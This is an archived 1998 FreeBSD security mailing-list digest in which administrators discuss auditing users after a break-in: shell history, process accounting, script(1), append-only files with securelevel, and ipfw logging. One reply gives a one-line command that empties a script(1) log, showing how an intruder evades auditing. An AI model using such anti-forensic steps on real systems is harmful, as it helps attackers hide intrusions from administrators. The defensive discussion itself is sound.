(Jay Tribick) Date: Fri, 28 Aug 1998 01:14:53 -0700 (PDT) Cc: security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Tribick writes: > > | > > What if the user would be to switch shell or to install their own? > | > > I do not think one should depend on shell history to log all what > | > > user does. How would YOU monitor what your users are > | > > doing if you had to? > | > > | > accton(8), lastcomm(1) > | > | It won't tell you much. Not in its' current state. It would be a good idea > | to extend acct to log everything, including program switches and (possibly) > | some stuff from the enviroment. Also it would be a good idea to be able > | to log information on per-user basis. > > Could we not modify the [kernel] to log all activity on the ttyp's to > a file? Yeah. You'll need to modify telnetd/rlogind/sshd/etc to do it. > > Regards, > > Jay Tribick > -- > [| Network Administrator | FastNet International | http://fast.net.uk/ |] > [| Finger netadmin@fastnet.co.uk for contact information |] > [| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:32:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA17293 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:32:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17288 for ; Fri, 28 Aug 1998 01:32:19 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id EAA06488; Fri, 28 Aug 1998 04:31:16 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: "Jan B. Koum " cc: Brian Behlendorf , Wilson MacGyver , security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: Shell history (Was: Re: post breakin log) In-reply-to: Your message of "Thu, 27 Aug 1998 21:55:59 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 28 Aug 1998 04:31:16 -0400 Message-ID: <6484.904293076@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jan B. Koum " wrote in message ID : > > This is assuming intruder will not try to change shell, turn off > history within the shell and is in general pretty clueless when it comes > to shell history. :) Don't install shells on your system then that don't have this feature. Its pretty simple :) I doubt hany hacker is gonna recompile the shell... Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:35:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA17579 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:35:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17561 for ; Fri, 28 Aug 1998 01:35:45 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id KAA18557 for freebsd.org!freebsd-security; Fri, 28 Aug 1998 10:34:50 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id KAA00493 for freebsd-security@freebsd.org; Fri, 28 Aug 1998 10:32:07 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199808280832.KAA00493@CoDe.hu> Subject: Re: post breakin log In-Reply-To: <1652.904271528@gjp.erols.com> from Gary Palmer at "Aug 27, 98 10:32:08 pm" To: freebsd.org!freebsd-security@zg.CoDe.hu Date: Fri, 28 Aug 1998 10:32:07 +0200 (CEST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Brian Behlendorf wrote in message ID > <19980827182323.6798.qmail@hyperreal.org>: > > Is there a fool-proof way to get user histories like this? I got one once > > only because the cracker was lame enough to forget to delete his > > .bash_history file. Presuming root isn't compromised of course... > > Force the history files to be created with uappend flag set and run with a non > zero security level. Please! What is the correct way to change security-level? Where can I do it? Yes, I know that in rc*, but which? And where? ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:35:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA17585 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:35:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17562 for ; Fri, 28 Aug 1998 01:35:45 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id KAA18560; Fri, 28 Aug 1998 10:34:51 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id KAA00469; Fri, 28 Aug 1998 10:20:51 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199808280820.KAA00469@CoDe.hu> Subject: Re: Shell history (Was: Re: post breakin log) In-Reply-To: from "Jan B. Koum" at "Aug 27, 98 09:55:59 pm" To: freebsd.org!freebsd-security@zg.CoDe.hu Date: Fri, 28 Aug 1998 10:20:51 +0200 (CEST) Cc: best.com!jkb@zg.CoDe.hu X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > This is assuming intruder will not try to change shell, turn off > history within the shell and is in general pretty clueless when it comes > to shell history. :) > A friend of mine came up with an idea to create a shell which > would log everything a user does.. not via shell history mechanism, but > rather ala watch(8). Everything user types would go into some files > somewhere. Then again, nothing ever came out of it. man script ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 02:02:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA21130 for freebsd-security-outgoing; Fri, 28 Aug 1998 02:02:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA21051 for ; Fri, 28 Aug 1998 02:02:00 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id KAA15603 for ; Fri, 28 Aug 1998 10:01:05 +0100 (BST) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id KAA13513 for ; Fri, 28 Aug 1998 10:01:04 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Fri, 28 Aug 1998 10:01:04 +0100 (BST) From: Jay Tribick X-Sender: netadmin@na.nu.na.nu To: security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: <199808280814.BAA07281@burka.rdy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > | It won't tell you much. Not in its' current state. It would be a good idea | > | to extend acct to log everything, including program switches and (possibly) | > | some stuff from the enviroment. Also it would be a good idea to be able | > | to log information on per-user basis. | > | > Could we not modify the [kernel] to log all activity on the ttyp's to | > a file? | | Yeah. You'll need to modify telnetd/rlogind/sshd/etc to do it. Hmm.. when I said 'we' I didn't actually mean me included ;) Regards, Jay Tribick -- [| Network Administrator | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact information |] [| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 03:23:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA28359 for freebsd-security-outgoing; Fri, 28 Aug 1998 03:23:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA28353 for ; Fri, 28 Aug 1998 03:23:54 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199808281023.DAA28353@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA087409759; Fri, 28 Aug 1998 20:22:39 +1000 From: Darren Reed Subject: Re: Shell history To: netadmin@fastnet.co.uk (Jay Tribick) Date: Fri, 28 Aug 1998 20:22:39 +1000 (EST) Cc: security@FreeBSD.ORG In-Reply-To: from "Jay Tribick" at Aug 28, 98 08:55:24 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Jay Tribick, sie said: > > > | > > What if the user would be to switch shell or to install their own? > | > > I do not think one should depend on shell history to log all what > | > > user does. How would YOU monitor what your users are > | > > doing if you had to? > | > > | > accton(8), lastcomm(1) > | > | It won't tell you much. Not in its' current state. It would be a good idea > | to extend acct to log everything, including program switches and (possibly) > | some stuff from the enviroment. Also it would be a good idea to be able > | to log information on per-user basis. > > Could we not modify the [kernel] to log all activity on the ttyp's to > a file? If Jullian Assange is around, I think he did something like that for Linux which maybe portable to Unix. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 06:22:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA17156 for freebsd-security-outgoing; Fri, 28 Aug 1998 06:22:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky ([203.96.56.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA17151 for ; Fri, 28 Aug 1998 06:22:51 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id BAA06869; Sat, 29 Aug 1998 01:20:09 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Sat, 29 Aug 1998 01:20:08 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Brendan Kosowski cc: FreeBSD Security Subject: Re: FreeBSD 2.2.5 Security Problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998, Brendan Kosowski wrote: > I suspect a regular security break-in on my FreeBSD 2.2.5 system for the > following reasons : > > > ( Note1 : my system has a small number of users which I know well ) > ( Note2 : my inetd.conf only enables FTPD, TELNETD & POPPER ) Popper looks like your problem. You probably know that by now, but your probelm doesn't end there. > 1. My Internet costs increased by 10 times last month. If you know which ip's or subnets all of your legitimate users will be connecting from, you can set up rules with ipfw to log all packets from outside those areas, or to ports you don't expect to be used. If the number of incoming connections is small, you could just set up a single rule: ipfw allow log tcp from any to ${your_ip} from any setup It won't catch udp traffic etc, but chances are it will be enough to find out where your hacker is coming from. Better still set ipfw up to block and log all but the minimum range of traffic you can get away with in order to provide normal service. There is a danger of letting your hacker know you're onto them before you cut them out because a scared hacker who wants to cover all traces of their access may try to delete stuff rather indiscriminately. > 2. I often see 2 SHELLS running when I do a "ps -ax" even though I am the > only person listed when I do a "who". Who will only list shells under particular circumstances, and in particular it won't list non-interactive shells the non-interactive shells which get spawned by lots of system and other processes. I'd be suspicious of shells which persist (same pid) over time, or perhaps where there are other reasons to suspect foul play. Seems like you probably have those. There are ways to avoid appearing in 'who'. > 3. My SYSLOG messages file has lots of telnetd "undefined errors" during > times when NO ONE is using the system. Very suspicious. > Does anyone have AN OFFICIAL LIST OF FreeBSD 2.2.5 SECURITY HOLES and > HOW TO FIX THEM ??? I hope not. Known holes should be plugged, not listed. To find out about current problems though, search the archives of the freebsd security lists, and the bugtraq archives at www.geek-girl.com. If you have system accounting turned on, you might want to try "sa -u". Otherwise, turning it on (in rc.conf) might be useful for figuring out what they're doing. Also check for stuff in history files in home directories. When you think you have your hacker online, you might use things like 'watch' (hrmm, probably not using a tty if they're not in 'who'), 'lsof', 'ktrace'. 'last' can be used to look at login times and where the login was from. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 08:07:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA27929 for freebsd-security-outgoing; Fri, 28 Aug 1998 08:07:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pluto.plutotech.com (mail.plutotech.com [206.168.67.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA27918 for ; Fri, 28 Aug 1998 08:07:11 -0700 (PDT) (envelope-from kelly@plutotech.com) Received: from plutotech.com (tampopo.plutotech.com [206.168.67.161]) by pluto.plutotech.com (8.8.7/8.8.5) with ESMTP id JAA13388; Fri, 28 Aug 1998 09:06:09 -0600 (MDT) Message-ID: <35E6C761.BF4CEAA2@plutotech.com> Date: Fri, 28 Aug 1998 09:06:09 -0600 From: Sean Kelly Organization: Pluto Technologies X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 3.0-CURRENT i386) MIME-Version: 1.0 To: Joe Gleason CC: "Jan B. Koum" , security@FreeBSD.ORG Subject: Re: Shell history (Was: Re: post breakin log) References: <002001bdd242$f1e3baf0$f10408d1@bug.tasam.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I don't know that much kernel stuff, but what if you hacked the kernel so > that whatever syscall opens/forks a new process will log the process name > and parameters? Set accounting_enable="YES" in /etc/rc.conf. --Sean To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 11:36:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA28477 for freebsd-security-outgoing; Fri, 28 Aug 1998 11:36:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from thing.dyn.ml.org (dyn1-tnt13-82.detroit.mi.ameritech.net [199.179.188.82]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA28470 for ; Fri, 28 Aug 1998 11:36:07 -0700 (PDT) (envelope-from mcdougall@ameritech.net) Received: from ameritech.net (bsdx [192.168.1.2]) by thing.dyn.ml.org (8.8.8/8.8.7) with ESMTP id OAA03423 for ; Fri, 28 Aug 1998 14:35:05 -0400 (EDT) (envelope-from mcdougall@ameritech.net) Message-ID: <35E6F857.1E8A4101@ameritech.net> Date: Fri, 28 Aug 1998 14:35:03 -0400 From: Adam McDougall X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 3.0-CURRENT i386) MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: Shell history (Was: Re: post breakin log) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jan B. Koum wrote: > > What if the user would be to switch shell or to install their own? > > I do not think one should depend on shell history to log all what > user does. Best way to implement something like watch(8) to check > the ttys you want or to automatically start when someone attaches > to a tty. Again, this is also flawed.. what if someone simply If you are that interested about what a particular user is doing on your system, should they even have an account? :) You could plop a script(1) command in their .cshrc or maybe in the system cshrc, etc if user=soandso SCRIPT(1) FreeBSD General Commands Manual SCRIPT(1) NAME script - make typescript of terminal session To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 12:11:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA03974 for freebsd-security-outgoing; Fri, 28 Aug 1998 12:11:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Mercury.unix.acs.cc.unt.edu (mercury.acs.unt.edu [129.120.220.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA03969 for ; Fri, 28 Aug 1998 12:11:43 -0700 (PDT) (envelope-from john@unt.edu) Received: from leonardo.cascss.unt.edu (leonardo.cascss.unt.edu [129.120.32.203]) by Mercury.unix.acs.cc.unt.edu (8.8.8/8.8.8) with ESMTP id OAA25784; Fri, 28 Aug 1998 14:10:49 -0500 (CDT) Received: (from john@localhost) by leonardo.cascss.unt.edu (8.8.8/8.6.9) id OAA16685; Fri, 28 Aug 1998 14:08:08 -0500 (CDT) From: john Message-Id: <199808281908.OAA16685@leonardo.cascss.unt.edu> Subject: Re: accounting. In-Reply-To: <35E6C761.BF4CEAA2@plutotech.com> from Sean Kelly at "Aug 28, 98 09:06:09 am" To: kelly@plutotech.com (Sean Kelly) Date: Fri, 28 Aug 1998 14:08:07 -0500 (CDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Set > > accounting_enable="YES" > > in /etc/rc.conf. But this doesn't seem to log the switches used for the program, or am I missing a switch. I have accounting enabled and when I went to use it the information in the accounting db didn't have command-line info. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 13:01:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA10991 for freebsd-security-outgoing; Fri, 28 Aug 1998 13:01:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA10959 for ; Fri, 28 Aug 1998 13:00:58 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from gigi (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id MAA13822; Fri, 28 Aug 1998 12:55:51 -0700 (PDT) Message-Id: <3.0.5.32.19980828125714.00bd8bc0@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Fri, 28 Aug 1998 12:57:14 -0700 To: Brett Glass , "Gregory P. Smith" , security@FreeBSD.ORG From: Jamie Lawrence Subject: Re: SSH port In-Reply-To: <199808280025.SAA18015@lariat.lariat.org> References: <199808280021.RAA03533@ryouko.nas.nasa.gov> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is mostly all out-of-proportion marketing hype of a modest, but decent, system. Hardly a general purpose advance. There was a discussion of this on Coderpunks recently. Archives for details. -j At 06:24 PM 8/27/98 -0600, Brett Glass wrote: >Sure. See > >http://www.research.ibm.com/news/detail/encryption.html > >There's an overview and a link to the paper. > >--Brett > > >At 05:21 PM 8/27/98 -0700, Gregory P. Smith wrote: > >> >>> It may be time for a new rev of SSH anyway. IBM's recently announced >>> method of shutting down known ciphertext "man in the middle" attacks >>> is worth adding to the protocol. >> >>Care to elaborate on this one (ie: a reference to the announcement or >>an explanation?). (cc' the list as others are bound to ask the same >>question :) >> >>Thanks, >>Greg >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 13:41:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA17704 for freebsd-security-outgoing; Fri, 28 Aug 1998 13:41:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pluto.plutotech.com (mail.plutotech.com [206.168.67.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA17698 for ; Fri, 28 Aug 1998 13:41:08 -0700 (PDT) (envelope-from kelly@plutotech.com) Received: from plutotech.com (tampopo.plutotech.com [206.168.67.161]) by pluto.plutotech.com (8.8.7/8.8.5) with ESMTP id OAA13508; Fri, 28 Aug 1998 14:40:08 -0600 (MDT) Message-ID: <35E715A7.34C01A22@plutotech.com> Date: Fri, 28 Aug 1998 14:40:07 -0600 From: Sean Kelly Organization: Pluto Technologies X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 3.0-CURRENT i386) MIME-Version: 1.0 To: john CC: freebsd-security@FreeBSD.ORG Subject: Re: accounting. References: <199808281908.OAA16685@leonardo.cascss.unt.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > accounting_enable="YES" > But this doesn't seem to log the switches used for the program Yep ... that'd be a good feature! --Sean To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 14:05:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA21232 for freebsd-security-outgoing; Fri, 28 Aug 1998 14:05:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Mercury.unix.acs.cc.unt.edu (mercury.acs.unt.edu [129.120.220.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA21225 for ; Fri, 28 Aug 1998 14:05:10 -0700 (PDT) (envelope-from john@unt.edu) Received: from leonardo.cascss.unt.edu (leonardo.cascss.unt.edu [129.120.32.203]) by Mercury.unix.acs.cc.unt.edu (8.8.8/8.8.8) with ESMTP id QAA11751; Fri, 28 Aug 1998 16:04:10 -0500 (CDT) Received: (from john@localhost) by leonardo.cascss.unt.edu (8.8.8/8.6.9) id QAA19029; Fri, 28 Aug 1998 16:01:28 -0500 (CDT) From: john Message-Id: <199808282101.QAA19029@leonardo.cascss.unt.edu> Subject: Re: Shell history (Was: Re: post breakin log) In-Reply-To: <35E6F857.1E8A4101@ameritech.net> from Adam McDougall at "Aug 28, 98 02:35:03 pm" To: mcdougall@ameritech.net (Adam McDougall) Date: Fri, 28 Aug 1998 16:01:28 -0500 (CDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Jan B. Koum wrote: > > > > What if the user would be to switch shell or to install their own? > > > > I do not think one should depend on shell history to log all what > > user does. Best way to implement something like watch(8) to check > > the ttys you want or to automatically start when someone attaches > > to a tty. Again, this is also flawed.. what if someone simply > If you are that interested about what a particular user is doing on your > system, should they even have an account? :) If an account is compromised then it's nice to have a nice concise log of what occured. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 15:12:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA00579 for freebsd-security-outgoing; Fri, 28 Aug 1998 15:12:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA00574 for ; Fri, 28 Aug 1998 15:12:15 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id PAA20209 for ; Fri, 28 Aug 1998 15:11:19 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 28 Aug 1998 15:11:19 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: security@FreeBSD.ORG Subject: Re: Shell history (Was: Re: post breakin log) In-Reply-To: <199808280820.KAA00469@CoDe.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org cat /dev/null > typescript -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Fri, 28 Aug 1998, Zahemszky Gabor wrote: >> >> This is assuming intruder will not try to change shell, turn off >> history within the shell and is in general pretty clueless when it comes >> to shell history. :) >> A friend of mine came up with an idea to create a shell which >> would log everything a user does.. not via shell history mechanism, but >> rather ala watch(8). Everything user types would go into some files >> somewhere. Then again, nothing ever came out of it. > >man script > >ZGabor at CoDe dot HU > >-- >#!/bin/ksh >Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 15:16:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA01073 for freebsd-security-outgoing; Fri, 28 Aug 1998 15:16:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA01064 for ; Fri, 28 Aug 1998 15:16:18 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id PAA20835; Fri, 28 Aug 1998 15:15:18 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 28 Aug 1998 15:15:18 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Zahemszky Gabor cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: <199808280832.KAA00493@CoDe.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In 3.0 you can do so within /etc/rc.conf: kern_securelevel_enable="NO" # kernel security level (see init(8)), kern_securelevel="-1" # range: -1..2 ; `-1' is the most insecure Which in turn sets this in the very end of /etc/rc: % tail -10 rc # Raise kernel security level. This should be done only after `fsck' has # repaired local file systems if you want the securelevel to be greater than 1. if [ "X${kern_securelevel_enable}" != X"NO" -a "${kern_securelevel}" -ge 0 ]; then echo 'Raising kernel security level' sysctl -w kern.securelevel=${kern_securelevel} fi date exit 0 % -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | 